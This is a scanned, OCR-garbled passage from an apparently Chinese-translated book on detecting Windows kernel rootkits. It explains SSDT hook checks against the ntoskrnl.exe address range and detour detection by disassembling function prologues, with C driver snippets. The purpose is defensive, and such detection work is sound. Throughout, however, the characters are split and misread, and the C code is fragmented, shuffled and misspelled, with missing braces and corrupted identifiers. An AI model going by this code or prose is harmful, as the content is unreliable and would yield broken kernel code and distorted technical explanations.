录 不 介绍 如 何在 这 种 情况 下 检测 SSDT 钩 子 。 









NTOSKRNL.EXE 
服务 表 


DescriptorEntry 


KeServiceDescriptorTable 










4814] DescriptorEntry 的 指针 
(NTOSKRNL.EXE) 
指向 DescriptorEntry 的 指针 

(Win32k.sys ) 


NTOSKRNL.EXE 
SSDT 


KiServiceTable 








指 回 KiServiceTable 的 指针 

















服务 函数 地 址 1 






指向 计数 器 表 的 指针 


指向 参数 表 的 指针 


© __declspec(dllimport) KeServiceDescriptorTable 


未 使 用 


未 使 用 







服务 函数 地 址 2 





服务 函数 地 址 3 


(2) KeServiceDescriptorTable[0] 


G) KeServiceDescriptorTable[0].KiServiceTable 


图 A-1 服务 调度 中 涉及 的 各 个 结构 


SSDT 检 测 代 码 
在 接 下 来 的 小 节 中 ， 我们 将 讨论 实现 前 述 的 3 个 步骤 的 检测 代码 。 


获得 SSDT 的 一 个 副本 ”为 了 编程 获得 表格 信息 ， 首 先 我 们 必须 定位 数据 结构 。 因 为 我 们 可 以 使 用 许多 写 入 文档 的 方法 来 达 
到 这 个 目标 ， 所 以 将 使 用 最 简单 的 方法 : 内 核 将 该 表 作为 符号 KeServiceDescriptorTable 输 出 ， 这 种 方法 只 是 动态 地 链接 到 这 个 
符号 ， 将 该 模块 导入 到 程序 中 。 当 然 ， 这 么 做 很 显眼 ， 所 有 监控 这 个 结构 的 Rootkit 都 会 注意 到 你 的 行动 。C 语 言 代码 很 简单 : 


__declspec(dllimport) KeServiceDescriptorTable KeServiceDescriptorTable; 


因此 ， 在 运行 时 ， 变 量 KeServiceDescriptorTable 将 会 装 入 并 且 可 以 由 我 们 的 代码 访问 。_KeServiceDescriptorTable 类 型 
是 程序 头 文件 中 定义 的 一 个 自 定义 结构 。 这 个 结构 中 的 字段 对 应 本 小 节 开 始 讨论 的 4 个 系统 表 (ntoskrnl.exe、win32k.sys 和 两 


个 未 用 的 表 ) ， 


typedef struct 


{ 


__DescriptorEntry 


void** KiServiceTable; 


unsigned long ServiceCounterTableBase; 


unsigned long NumberOfServices; 


unsigned char* ServiceParameterTableBase; 


} DescriptorEntry, *pDescriptorEntry; 
//SSDT table structure 
typedef struct 


{ 


ntoskrnl; 
win32k; 
unusedl1; 


DescriptorEntry 
DescriptorEntry 
DescriptorEntry 
DescriptorEntry unused2; 


} _KeServiceDescriptorTable, 


注意 : 在 继续 之 前 ， 确 定 你 扎实 地 掌握 了 这 两 个 结构 之 间 的 关系 ， 
现在 我 们 在 这 个 结构 中 存储 了 SSDT， 只 要 循环 读 取 这 个 


每 个 表格 中 的 第 一 个 项 目 引 用 包含 指向 真正 SSDT 指 针 的 一 个 描述 符 表 。 实 现 这 个 配置 的 数据 结构 如 下 : 


Base address of the SSDT 
counter base addr 


// 
// 
A 
// 


Number of services 
Base address of param table 


__KeServiceDescriptorTable 


// Entry for ntoskrnl.exe 
// Entry for win32k.sys 


// Unused 
// Unused 


*p KeServiceDescriptorTable; 


以 及 它们 是 如 何 与 图 A-1 中 说 明 的 概念 对 应 的 。 


结构 并 打印 表格 就 行 


void PrintSSDT( KeServiceDescriptorTable Table) 


{ 


int i=0; 


void* AddroOfSystemServiceFunction; 


char parameterValue; 
void** pKiServiceTable = 


char* pServiceParameterTableBase = 
SSDT table dump: \n\n") 
------------ \n") ; 

+ 


for (1=0;i< (int) Table.ntoskrnl.NumberOfServices;i+ 


DbgPrint ("PrintSSDT(): [1] 


DbgPrint (" 


{ 


AddroOfSystemServiceFunction 


Table.ntoskrnl.KiServiceTable; 


Table.ntoskrnl.ServiceParameterTableBase; 


i 


) 


= pkKiServiceTable [i]; 


parameterValue=pServiceParameterTableBase [i] ; 


DbgPrint ("Index 


i, AddrOfSystemServiceFunction, 


} 


DbgPrint (" 


$a: \tHandlerAddr: 


0x%08p,\tParameterNum: %d\n", 


parameterValue) ; 


黑客 90210 在 Rootkit.com 上 的 一 个 帖子 (http://www.Rootkit.com/newsread.php?news-id=176) 中 指出 ， 这 种 方法 在 
SSDT 被 重 定位 (也 就 是 没有 位 于 基 表 的 索引 0 中 的 地 址 ) 时 可 能 不 可 靠 。 具 有 讽刺 意味 的 是 ， 帖 子 的 作者 指出 Kaspersky 防 病毒 


软件 就 是 重 定位 SSDT 以 欺骗 某 些 Rootkit 的 一 个 例子 。 这 有 一 个 
程序 。 黑 客 90210 提 出 寻找 服务 表 真 实 位 置 最 佳 的 方法 是 解析 内 核 的 二 进 
这 些 重 定位 是 否 引 用 系统 服务 表 。 如 果 找 到 引用 服务 表 地 址 的 重 定位 ， 程 序 解析 该 汇编 指 
的 操作 码 。 如 果 操 作 码 匹配 ， 那 么 这 条 指令 重 定位 该 表 ， 程 序 复制 重 定位 的 立即 地 址 (RVA) 。 


SSDT, 


获得 KeServiceDescriptorTable 地 址 的 另 一 个 简单 方法 是 调用 Windows APIK 


令 人 遗憾 的 副作用 ， 就 是 也 会 欺骗 依赖 以 上 方法 的 Rootkit 检 测 

制 文件 (ntoskrnl.exe) ， 找 出 所 有 重 定位 引用 ,确定 
令 以 查找 指出 表格 被 移 到 一 个 立即 地 址 
接着 程序 转 储 该 地 址 上 的 


函数 GetProcAddress () 。 函数 读 取 给 定 


模块 中 输出 符号 的 内 存 地 址 。 其 他 的 替代 方案 如 SDTRestore 所 用 的 (http://www.security.org.sg/code/sdtrestore.html) , 


包括 人 工 检查 ntoskrnl.exe 二 进 制 文件 的 输出 表 查 找 其 中 的 结构 偏 移 量 。 该 偏 移 量 之 后 被 加 到 ntoskrnl.exe 的 装 入 基地 址 ， 这 是 
独立 于 服务 包 的 结构 查找 方法 。 应 该 注意 ， 这 种 技术 在 已 自 定义 用 户 空间 内 存储 存 启动 (例如 ， 在 启动 Windows 时 使 用 /3G 开 
X) 的 系统 上 会 失败 ， 因 为 这 种 技术 假定 内 存 空间 从 0x80000000 开 始 。 


寻找 内 核 基 地 址 ”内存 中 装 入 的 任意 模块 的 基地 址 都 可 以 使 用 许多 系统 API (如 LoadLibrary () ) 读 取 。 (过 去 ) RRA 
著 的 未 写 入 文档 函数 ZwQuerySystemlnformation () 适 于 这 个 目的 。 这 种 简单 的 技术 是 : 


- 获得 装 入 模块 的 列表 。 
- 循环 读 取 模 块 列 表 查找 “htosktnlexe”。 
- 返回 ntoskrnl.exe 的 基地 址 和 大 小 。 


ZwQuerysystemlnformation () 接受 许多 信息 类 结构 来 读 取 各 类 数据 (进程 列表 、 装 入 模块 列表 等 ) 。 我 们 将 向 这 个 浮 
数 传递 一 个 名 为 SystemModulelnformation 的 类 型 ， 定 义 如 下 : 


typedef struct SYSTEM MODULE INFORMATION 
{ 

DWORD reservedl1; 

DWORD reserved? ; 

PVOID Base; 

ULONG Size; 

ULONG Flags; 


USHORT Index; 
USHORT Unknown; 


USHORT LoadCount; 
USHORT ModuleNameOffset; 
CHAR ImageName [256]; 
} SYSTEM MODULE INFORMATION, *PSYSTEM MODULE INFORMATION; 


为 了 得 到 ntoskrnl.exe 的 属性 ， 我 们 将 用 相关 的 参数 调用 API: A 


nt=ZwQuerySystemInformation (SystemModuleInformation, 
pModuleList, 
bufsize, 
returnLength) ; 


然后 ， 我 们 将 在 模块 列表 中 循环 查找 ntoskrnl.exe， 记 录 基 地 址 和 大 小 : 


for (i=0;1i< (long) pModuleList->ModuleCount ; i++) 


{ 
// {error exception handling code here] 
//compare module name 
If (strcmp (pModuleList->ImageName, findName) ) 
{ 
modstart=(ULONG) pModuleList->Modules [i] .Base; 
modend=modstart+pModuleList->Modules [i] .Size; 
//return this information 
} 


检查 每 个 SSDT 项 目的 钩子 ”现在 我 们 有 了 SSDT 信 息 ， 并 且 知 道 了 SSDT 中 服务 函数 地 址 所 应 该 指向 的 (ntoskrnl.exe 的 范 
围 ) ， 遍 历 表格 比较 每 个 函数 地 址 就 是 件 简单 的 事情 了 。 只 需 简单 地 修改 PrintSSDT () 函数 来 比较 每 个 项 目 和 notskrnl.exe 范 
围 : 


If (KiServiceTable[i] < ntoskrnlStartAddress | | 
KiServiceTable[i] > ntoskrnlEndAddress) 


//This SSDT entry is hooked!! 


下 一 步 应 该 是 恢复 原始 的 SSDT 项 目 (从 磁盘 装 入 ntoskrnl.exe 二 进 制 代 码 并 且 查 找 这 个 项 目的 正确 地 址 ) 或 者 选择 性 地 对 
挂钩 这 个 函数 的 模块 进行 一 些 分 析 ， 这 些 模块 可 能 是 一 个 软件 防火 墙 或 者 防 病毒 产品 。 粗 略 的 分 析 能 够 消除 假 阳性 。 


需要 考虑 的 一 个 问题 是 假 阴 性 ; 因为 SSDT 中 特定 的 服务 函数 地 址 有 效 (也 就 是 在 内 核 范围 内 ) 并 不 意味 着 服务 函数 本 身 没 
有 被 污染 。 该 函数 本 身 可 能 被 典型 的 函数 detour/ 修 补 所 侵害 。 和 SSDT 钧 子 达 到 相同 目标 的 隐身 替代 品 是 修补 实现 SSDT 指 向 的 
函数 的 实际 模块 代码 ， 而 不 是 挂钩 SSDT 中 的 指针 。 这 种 方法 越 来 越 流 行 ，2007 年 的 W32/Almanahe Rootkit 就 是 证 据 。 


现在 我 们 更 深入 地 观察 一 下 detour。 
A.2.2 SSDT 中 的 修补 /detour 检 测 


第 4 章 中 讨论 过 ， 函 数 detour (也 就 是 修补 ) 广泛 地 用 在 Windows 中 ， 最 有 名 的 是 Windows 更 新 服务 中 的 热 修 复 。 实 际 
上 ，Microsoft 发 行 了 一 个 开源 工具 Detours， 帮 助 开发 人 员 在 自己 的 产品 中 因为 各 种 目的 实施 函数 
detour (http://research.microsoft.com/en-us/projects/detours/) 。 这 个 产品 目前 仍 由 Microsoft 研 究 所 提供 维护 。 


函数 detour 在 设计 上 极其 简单 。detour 针 对 一 个 函数 ， 修 补 并 且 履 盖 阔 数 序言 为 跳 转 到 detour 本 身 的 函数 。 这 时 ，detour 
可 以 进行 预 处 理工 作 ， 例 如 修改 用 于 原始 函数 的 参数 。detour 的 函数 接着 调用 所 谓 的 蹦床 函数 ， 这 个 函数 调用 原始 的 函数 ( 传 
递 所 有 修改 过 的 参数 ) 。 然 后 ， 原 始 的 函数 按照 设计 工作 ， 并 且 返 回 到 修补 过 的 函数 ， 由 该 函数 进行 一 些 后 期 处 理工 作 ， 如 修改 
原始 函数 的 结果 ， 为 了 文件 的 隐藏 ， 可 以 是 删除 某 些 项 目 。 


出 于 我 们 自己 的 目的 ， 我 们 对 寻找 蹦床 函数 不 感 兴趣 ; 我 们 所 感 兴趣 的 是 找到 原始 的 detour， 它 一 般 覆 盖 沙 数 序言 的 前 5 个 


Bi a 
个 字 节 寻 


字 节 (足以 放下 一 个 短 跳 转 指令 和 操作 数 ) 。 我 们 将 扫描 25 找 这 样 的 覆盖 。 


用 于 检测 这 些 序言 修补 的 方法 与 SSDT 钩 子 检测 方法 类 似 ， 但 是 我 们 不 遍历 函数 地 址 表 确 定 地 址 落 在 内 核 范围 ， 而 是 检查 给 
定 函 数 的 头 几 条 指令 没有 跳 转 或 者 调用 另 一 个 模块 。 但 是 ， 在 我 们 讨论 检测 步骤 和 代码 之 前 ， 先 深入 地 看 看 影响 我 们 的 检测 逻辑 
的 x86 体 系 结构 的 基础 知识 。 


注意 : 这 种 检测 技术 没有 包含 嵌入 函数 钩子 的 检测 ， 座 入 函数 钩子 覆盖 函数 体 而 不 是 函数 序言 。 


理解 跳 转 和 调用 


为 了 理解 解析 x86 指 令 的 复杂 性 和 其 在 detour 检 测 中 的 应 用 ， 我 们 来 看 看 如 何人 工分 析 x86 指 令 操作 码 和 操作 数 以 检测 
detour。 在 实际 的 代码 中 ， 我 们 将 使 用 一 个 开放 源码 反 汇 编程 序 来 进行 现在 研究 的 这 些 艰 苦 的 工作 。 


在 读 取 我 们 希望 测试 的 函数 的 头 几 个 字 节 时 ， 我 们 必须 能 够 翻译 原始 的 字 节 。 原 始 的 字 节 对 应 于 指令 和 数据 ， 两 者 以 不 同 的 
方式 处 理 。 对 于 指令 ， 因 为 我 们 打算 寻找 分 支 指令 (也 就 是 跳 转 指令 JMP 和 调用 指令 CALL 的 变种 ) ， 所 以 要 考虑 的 操作 码 集 有 
限 。 我 们 可 以 在 x86 手 册 中 寻找 各 种 JMP/CALL 指 令 ， 将 其 硬 编码 到 检测 例 程 中 (网 上 的 手册 快速 参考 请 
到 http://home.comcast.net/~fbui/intel.html 查 看 ) 。 


这 里 ,我 们 实际 上 实现 了 自己 的 基本 反 汇 编程 序 。 我 们 还 需要 知道 指令 的 大 小 (JMP 是 1 个 字 节 ) ， 这 样 可 以 在 读 取 字 节 时 
参考 这 个 基本 的 查找 表格 。 接 着 ,确定 不 是 JMP/CALL 就 是 很 容易 的 事情 了 。 
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对 于 指令 操作 数 /数据 ， 我 们 的 目标 是 将 其 转换 为 正确 的 内 存 地 址 ， 这 样 可 以 确定 JMP/CALL 分 支 执行 的 位 置 。 如 果 操 作 数 
引用 函数 二 进 制 模块 之 外 的 内 存 地 址 ， 就 很 可 能 是 一 个 detour。 为 了 处 理 操 作 数 /数据 ， 我 们 必须 考虑 所 有 x86 调 用 类 型 和 指令 
参数 可 能 采用 的 寻 址 模式 。 有 4 种 调用 类 型 ， 但 是 我 们 只 考虑 近 调用 和 远 调用 。 近 调用 发 生 在 内 存 中 的 相同 的 代码 段 内 (在 代码 
段 CS 寄存 器 中 指定 ) ， 使 用 相对 寻 址 (地址 是 一 个 当前 指令 地 址 的 偏 移 量 ) 。 因 此 ， 近 调用 指令 以 如 下 形式 出 现 : 
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-rel16/rel32 16 位 或 者 32 位 相对 地 址 〈( 例 如 ，JMPOxABCD) 。 
“rm16/rm32 16 位 或 者 32 位 寄存 器 或 者 内 存 地 址 (例如 JMP EAX, JMP[EAX] 2.4 JMP0x12345678) o 


远 调 用 分 支 进入 内 存 中 完全 不 同 的 代码 段 ， 因 此 处 理 器 对 执行 转移 进行 仲裁 (因为 它 运行 于 保护 模式 ) 。 处 理 器 查询 指定 段 
选择 符 的 GDT 或 者 LDT， 确 定 选 择 符 的 类 型 、 访 间 特 权 、 代 码 特权 级 和 其 他 属性 。 远 程 调用 形式 为 [ 段 ]:[ 偏 移 ] 指 针 : 


ptr16: 16 一 个 16 位 选择 符 加 上 一 个 16 位 偏 移 量 (例如 JMPOx1234: 0x5512) o 
- ptr16: 32 一 个 16 位 选择 符 加 上 一 个 32 位 偏 移 量 (例如 JMP0x1234: 0x4412ABCD) 。 


m16: 16 一 个 16 位 内 存 地 址 选择 符 加 一 个 16 位 内 存 地 址 偏 移 。 





- m16: 32 一 个 16 位 内 存 地 址 选择 符 加 一 个 32 位 内 存 地 址 偏 移 。 


你 可 以 看 到 ， 这 有 些 复杂 。 我 们 必须 进行 一 些 指针 计算 ， 还 要 在 全 局 描述 符 表 (GDT) 中 查找 段 选 择 符 。 记 住 ，GDT 是 处 
理 器 用 于 维护 各 种 段 的 内 人 存 保护 的 表格 。 因 此 ， 我 们 必须 查询 GDT 计 算 远 程 调用 的 有 效 地 址 。 我 们 如 何 完成 这 一 工作 。 


SIMA 


对 于 前 两 种 类 型 ， 提 供 的 地 址 是 一 个 两 部 分 的 指针 。 第 一 部 分 (冒号 左边 的 ptr16) 是 一 个 指向 段 选择 符 的 16 位 指针 ; 这 个 
选择 符 将 指向 GDIT 表 格 中 包含 代码 段 正 确 内 存 及 地 址 的 一 个 项 目 (该 项 目 可 能 是 数据 、 调 用 门 和 其 他 类 型 ) 。 第 二 部 分 (冒号 
右边 的 16) 是 选中 的 段 中 的 16 位 偏 移 量 。 因 此 ， 将 来 自 GDT 的 基地 址 加 上 指定 的 偏 移 量 就 得 到 有 效 地 址 (这 种 转换 过 程 在 Inter 
x86 术 语 学 中 被 称 为 逻辑 -线性 地 址 转换 ) 。 这 是 JMP/CALL 指 令 的 参数 。 
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表 A-2 概 述 了 处 理 detour 所 用 的 函数 序言 字 节 的 查找 表格 。 


注意 : 我 们 没有 包括 使 用 间接 地 址 (也 就 是 寄存 器 或 者 内 存 地址 ) 作为 操作 数 的 JMP/CALL 变 种 (JMP 操 作 码 为 0xFF) 。 还 
要 注意 64 位 体系 结构 工作 方式 不 同 ， 有 些 操作 码 是 不 允许 的 (用 * 表 示 ) 。 


表 A-2 ” detour 检测 的 查找 表 





近 JMP 32 1 字 节 4 字 节 5 
iz JMP p16:16* 2 字 节 3 字 节 


远 CALL p16:16* 1 字 节 4 字 节 5 字 


解释 一 下 表 A-2 中 使 用 的 助 记 法 , 项目“ 远 JMP p16: 32” 意 为 “ 远 JMP 指 令 ， 执 行 时 跳 转 目 标 是 16 位 选择 符 定义 的 远 指针 
和 一 个 32 位 的 偏 移 值 。” 这 个 记 法 意味 着 你 必须 查询 GDT 查 找 段 选择 符 p16 (16 位 指针 ) 所 指向 的 段 的 基地 址 ， 并 且 将 其 加 上 
冒号 右边 的 16 位 或 者 32 位 地 址 指定 的 偏 移 量 。 


注意 ， 短 JMP 仅 使 用 1 字 节 地 址 作为 操作 数 。 因 此 ， 我 们 不 用 在 意 这 些 JMP， 它 们 在 模块 内 跳 转 。 
根据 这 个 查找 表格 ， 我 们 将 根据 操作 码 进行 以 下 两 个 操作 之 一 : 


1) 如 果 操 作 码 指 的 是 一 个 近 JMP 或 者 近 CALL (0xE8 和 0xE9) ，JMP 目 标 将 是 JMP 下 一 条 指令 的 地 址 加 上 操作 数 (因为 地 
址 是 相对 的 ) 。 


2) 如 果 操 作 码 指 的 是 一 个 远 JMP 或 者 远 CALL (0xEA 和 0x9A) ， 解 析 一 个 16 位 段 选 择 符 (冒号 左边 ) 确定 是 否 必须 查询 
GDT 或 者 LDT 以 查找 段 的 基地 址 ， 这 个 基地 址 被 加 到 给 定 的 偏 移 量 上 (冒号 的 右边 ) 。 这 是 JMP 或 者 CALL 的 目标 。 


如 果 你 不 能 全 部 理解 ， 也 不 要 紧 。 实 现 这 些 操作 的 代码 非常 简单 ， 但 是 解释 却 不 容易 (你 现在 可 能 了 解 了 ) 。 人 花费 一 点 时 间 
透彻 了 解 我 们 在 本 小 节 中 关于 x86 体 系 结构 的 讨论 。 还 有 ， 一 定 要 看 看 756 页 的 《Intel 编 程 人 员 手 册 》， 特 别 是 关于 内 存 保护 机 
制 的 第 5 章 (http://www.intel.com/Assets/PDF/manual/253668.pdf) 。 


检测 方法 


我 们 已 经 讨论 了 一 些 基 础 知识 ， 现 在 让 我 们 进入 问题 的 中 心 。 你 如 何 检测 已 经 被 覆盖 的 函数 序言 ， 然 后 解析 恶意 的 
JMP/CALL 的 地 址 ? 


第 一 步 是 定义 你 希望 扫描 的 模块 和 函数 。 你 的 答案 根据 目标 可 能 有 所 不 同 。 例 如 ， 你 希望 扫描 系统 上 内 存 中 装 入 的 每 个 模块 
中 (DLL、 内 核 驱动 程序 、exe 等 ) 的 每 个 输出 函数 。 你 更 可 能 希望 验证 核心 系统 模块 。 简 单 起 见 ， 我 们 将 假定 模块 是 
ntoskrnl.exe, Ba&zSeAccessCheck () 。 选 择 ntoskrnl.exe 是 因为 这 可 以 在 前 面 介绍 的 SSDT 检 测 代码 基础 上 构建 〈 记 住 ， 
我 们 提 到 过 ， 验 证 之 后 如 果 有 一 个 SSDT 项 目 未 被 挂钩 ， 下 一 步 是 检查 函数 序言 中 的 detours/ 修 补 ) 。 选 择 SeAccessCheck () 
是 因为 著名 的 Rootkit MigBot (由 Greg Hoglund 开 发 ) 在 这 个 函数 的 序言 中 安装 了 一 个 detour。 这 样 ， 我 们 将 有 很 好 的 测试 


用 例 来 验证 自己 的 代码 。 


知道 了 你 所 感 兴趣 的 函数 /模块 之 后 ， 我 们 将 把 据 向 这 个 函数 的 一 个 指针 传递 给 detour 扫 描 例 程 
IsFunctionPrologueDetoured () 。 这 个 例 程 将 扫描 SeAccessCheck 的 序言 ， 查 找 头 25 个 字 节 中 的 detour。 它 将 使 用 一 个 开 
源 反 汇 编程 序 识别 JMP/CALL 例 程 ， 然 后 尝试 解析 指令 的 目标 。 


如 果 所 有 工作 完成 之 后 ， 计 算出 来 的 JMP/CALL 地 址 指向 SeAccessCheck () 包含 模块 (ntoskrnl.exe) 的 地 址 空间 之 外 ， 
那么 你 应 该 强烈 地 怀疑 这 个 函数 被 修补 过 。 


Detour 检 测 代码 


现在 我 们 将 介绍 实现 前 一 小 节 讨 论 的 检测 技术 的 代码 。 我 们 在 前 面 介绍 的 SSDT 检 测 代码 之 上 构建 ， 这 些 代码 实际 上 需要 为 
SSDT 代 码 所 声明 的 相同 数据 结构 ， 在 SSDT 项 目 中 循环 ， 然 后 调用 一 个 新 水 数 lIsFunctionPrologueDetoured () 测试 前 几 个 
CALL/JMP 指 令 。 列 举 SSDT 的 主 循 环 在 下 面 列 出 ， 我 们 将 分 解 各 个 代码 块 ， 更 深入 地 解释 最 重要 的 部 分 。 


//loop through SSDT entries 
for (i=0;i< (int) KeServiceDescriptorTable.ntoskrnl .NumberOfServices;i++) 


{ 


//get the address of this service function and number of parameter bytes 


ServiceFunct ionAddress= (ULONG) 
KeServiceDescriptorTable.ntoskrnl.KiServiceTable [i] ; 


ServiceFunctionParameterBytes= (ULONG) 
KeServiceDescriptorTable.ntoskrnl.ServiceParameterTableBase [i] ; 


//assign the "known good" service function name 
//which is pulled from a lookup table 
//i.e., what service address is normally stored at this index in the ssdt? 
RtlStringCbCopyExA (ServiceFunctionNameExpected, 
1024, 
GetKGServiceFunctionName ((UINT)i), 
NULL, 
NULL, 
0); 


注意 ， 为 了 简洁 ， 代 和 码 片段 中 的 某 些 函数 的 源 代 码 (原型 和 定义 ) MEX. (BS, BERETS RASA, RINSE 
注释 中 指出 遗漏 的 信息 。 


我 们 应 该 指出 ServiceFunctionNameExpected 和 ServiceFunctionNameFound 这 两 个 变量 之 间 的 区 别 。 第 一 个 变量 使 用 
前 面 没有 提 到 的 一 个 查找 表 输 入 。 这 个 查找 表 包 含 根 据 Windows 版 本 和 服务 包 的 所 有 系统 服务 程序 的 已 知 索引 。 思 路 是 你 根据 
当前 操作 系统 版 本 和 服务 包 可 以 知道 应 该 在 SSDT 中 任何 给 定 索 引 处 的 是 哪个 国 数 。 


这 一 信息 可 以 从 任何 能 够 转 储 SSDT 表 格 的 工具 中 收集 到 ， 如 WinDbg (我 们 使 用 一 些 定制 的 PHP 解 析 脚 本 下 
载 http://www.metasploit.com/users/opcode/syscalls.html 上 的 数据 ， 并 将 查找 表格 格式 化 为 C 语 言 代 码 ) 。 通 过 转 储 所 有 主 
要 Windows 版 本 和 服务 包 的 表格 ， 我 们 可 以 建立 一 个 简单 的 查找 表格 ， 供 枚 举 这 个 特定 系统 的 SSDT 时 使 用 。 在 输出 中 包括 这 些 
言 息 对 于 显示 预期 的 SSDT 项 目 和 实际 的 SSDT 项 目 之 间 的 差异 很 有 帮助 。 


这 里 ， 我 们 将 通过 解析 ntoskrn| 的 输出 表 来 提取 实际 SSDT 项 目的 函数 名 称 (也 就 是 变量 ServiceFunctionNameFound) 。 
我 们 为 什么 要 这 么 做 ”因为 SSDT 不 包含 冰 数 名 称 ， 而 只 有 地 址 、 参 数 和 索引 。 所 以 我 们 采用 地 址 来 查找 在 ntoskrnl.exe 中 的 相 
应 输出 。 当 然 ， 这 一 方法 在 大 部 分 SSDT 项 目 上 注定 要 失败 ， 因 为 大 部 分 这 些 服务 函数 都 没有 由 内 核 输出 (但 是 它们 可 以 由 内 核 
本 身 在 内 部 使 用 ) ! 


下 一 步 是 尝试 寻找 内 存 中 包含 给 定 服务 函数 地 址 的 装 入 模块 ， 以 便 找 出 包含 这 个 浮 数 的 模块 : 


//get the containing module of this service function 
// by its address in memory 
if (GetModInfoByAddress (ServiceFunctionAddress,pThisModule) ) 
{ 
Rt1lStringCbCopyExA (ContainingModule, 256,pThisModule->ImageName, NULL, NULL, 0) ; 
//get the name of the function from the containing module's export table 
//or if not exported, store [unknown] 
if (!GetFunctionName (pThisModule->Base, 
ContainingModule, 
ServiceFunctionAddress, 
ServiceFunct ionNameFound) ) 
Rt1lStringCbCopyExA (ServiceFunctionNameFound, 
1024, 
pUnknownBuf, 
NULL, NULL, 0) ; 
} 


//if we can't find the containing module, there's a problem: 


// (1) ZwQuerySystemInformation() is hooked. We're screwed. 
// (2) the module was not in the system's module list, 

ye so it was injected somehow. In either case, the user 
// should suspect something's up from this fact alone. 
else 


Rt1lStringCbCopyExA (ContainingModule, 256,pUnknownBuf ,NULL,NULL, 0) ; 
Rt1lStringCbCopyExA (ServiceFunctionNameFound, 1024, 
pUnknownBuf, NULL, NULL, 0) ; 


为 了 确定 给 定 的 SSDT 入 口 指 向 一 个 被 绕 开 的 函数 ， 我 们 将 调用 IsFunctionPrologue Detoured () ， 很 快 我 们 将 对 这 个 
数 作 更 详细 的 研究 : 


IsDetoured=IsFunctionPrologueDetoured (ServiceFunctionAddress, 
ntoskrnl_ base, 
ntoskrnl_size, 

d) ; 

//if it is detoured, we may have found the 

//containing module that way, so reassign here 

if (IsDetoured) 

if (d->detouringModule != NULL) 
Rt1lStringCbCopyExA (ContainingModule, 256, 
d->detouringModule, NULL, NULL, 0) ; 


DbgPrint ("%-3d aire or 

DbgPrint ("%-08X " ServiceFunctionAddress) ; 
DbgPrint ("%-25.24s ", ServiceFunctionNameExpected) ; 
DbgPrint ("%-25.24s 1 ServiceFunctionNameFound) ; 


至 此 ， 我 们 有 了 SSsDT 信 息 以 及 对 函数 是 否 被 绕 开 的 粗略 估计 。 输 出 这 一 信息 时 ， 查 看 我 们 在 函数 中 检查 以 确定 函数 是 否 被 
绕 开 的 字 节 的 反 汇编 结 果 是 有 用 的 。 这 一 过 程 比 简单 的 操作 码 检 查 (例如 0x9A 是 CALL 指 令 ) 要 难得 多 。 实 际 上 ， 最 简单 的 方法 


是 包含 一 个 来 自 开源 社区 杰出 的 x86 反 汇编 程序 。 我 们 选择 的 是 Gil Dabah 的 diStorm 反 汇编 程序 
(http://ragestorm.net/distorm/) 一 一 我 们 在 此 要 感谢 这 个 难以 置信 的 轻 量 级 精确 反 汇 编程 序 的 作者 ! 这 个 免费 工具 使 我 们 
能 够 反 汇编 并 且 显 示 遂 数 序言 的 头 25 个 字 节 ， 我 们 用 它 来 确定 浮 数 是 否 被 绕 开 : 

//if this function has been detoured, output a 


//disassembly string of up to 25 bytes 
if (IsDetoured) 


{ 
DbgPrint ("%-10s vw "YES"); 
DbgPrint ("%-35.34s\n", ContainingModule) ; 
//loop through possible decoded instructions 
DbgPrint (" -> 25-byte disassembly: \n") ; 
for (j = 0;j<d->numDisassembled; j++) 
{ 

DbgPrint ("%08I64x (%02d) %s %s %s\n", 
d->decodedIinstructions [j] .offset, 
d->decodediInstructions [j] .size, 

(char*) d->decodedInstructions [j] .instructionHex.p, 
(char*) d->decodedInstructions[j] .mnemonic.p, 
(char*) d->decodedInstructions[j] .operands.p) ; 
} 
else 


DbgPrint ("%-10s " "No"),; 

DbgPrint ("%-8s "," [N/A] ") 

DbgPrint ("%-5s","[N/A]") ; 

DbgPrint ("%-35.34s\n",ContainingModule) ; 


IsFunctionPrologueDetoured () 的 主要 部 分 如 下 ， 这 个 函数 在 前 一 个 阔 数 的 主 循环 中 列举 所 有 SSsDT 项 目 时 调用 : 


//using diStorm open source dissembler, try to disassemble 25 bytes 
//starting at the function's start address (prologue) 
if (diStorm_Disasm(FuncAddr,numBytesToDisasm, disassembly, &numDisassemb1led) ) 
{ 
for (i1=0;i<numDisassembled;i++) 
d->decodedInstructions [i] =disassembly [i] ; 
d->numDisassembled=numDisassembled; 


现在 ， 我 们 已 经 反 汇 编 了 函数 序言 ， 将 要 解析 结果 信息 中 的 任何 JMP 或 者 CALL 指 令 。 阔 数 序言 中 存在 这 样 的 指令 可 能 是 恶 
意 模 块 detour 的 证 据 。 为 了 减少 假 阳性 ， 目 标 在 模块 地 址 空间 内 的 detour 被 认为 是 良性 的 : 


//loop through resulting 25-byte disassembly and parse any CALL or JMPs 
for (j=0; j<d->numDisassembled; j++) 


{ 


doSkipOperand=FALSE; 
RtlStringCchPrintfW(wstrMnemonic,60,L"%S", 
d->decodedInstructions [j] .mnemonic.p) ; 
RtliInitUnicodeString(&uMnemonic, (PCWSTR) wstrMnemonic) ; 
//if it is a JMP or a CALL, do further processing 
if (RtlCompareUnicodeString (&uMnemonic, &udmpString,TRUE) == 0 | | 
Rt 1lCompareUnicodeString (&uMnemonic, &uCallString, TRUE) == 0) 


//the .operands field is a comma-separated list of up to 3 operands 
//for JMP/CALL, we don't want any with commas, skip them 
for (k=0;k< (UINT) d->decodedInstructions [j] .operands.length;k++) 


{ 


if (d->decodedIinstructions[j].operands.p[k] == ',') 
{ 

doSkipOperand=TRUE; 

break; 


} 
//if multi-operand, skip 
if (doSkipOperand) 
continue; 
//first, try to parse a segment_selector:offset 
//argument to the CALL/JMP 
//if this fails (i.e., the argument has no colon), 
//assume immediate address 
//Note: GetFarCallData() simply parses the string. 


if (GetFarCallData(d->decodedInstructions[j] .operands.p, 
d->decodedInstructions[j] .operands. 
length, SegmentSelector, Offset) ) 


//convert the ASCII CHAR string to WCHAR 
//then to unicode for comparison 
RtlStringCchPrintfw(wTargetAddress,15,L"%S",Offset) ; 
} 
//otherwise, fill the target address with the immediate operand 
else 
{ 
//convert the ASCII CHAR string to WCHAR 
//then to unicode for comparison 
RtlStringCchPrintfw(wTargetAddress,15,L"%S", 
d->decodediInstructions[j].operands.p) ; 
} 
RtlinitUnicodeString (&uTargetAddress, (PCWSTR) wlargetAddress) ; 
//convert the unicode string to a 64-bit integer 
nt=Rt1lUnicodeStringTolInteger (&uTargetAddress, 0, &addr) ; 
//if the conversion succeeded, dereference the converted ULONG 
if (nt==STATUS_ SUCCESS) 
d->TargetAddress=(DWORD) addr; 
else 
d->TargetAddress=0; //otherwise, bail. 
//find the module that owns this target address 
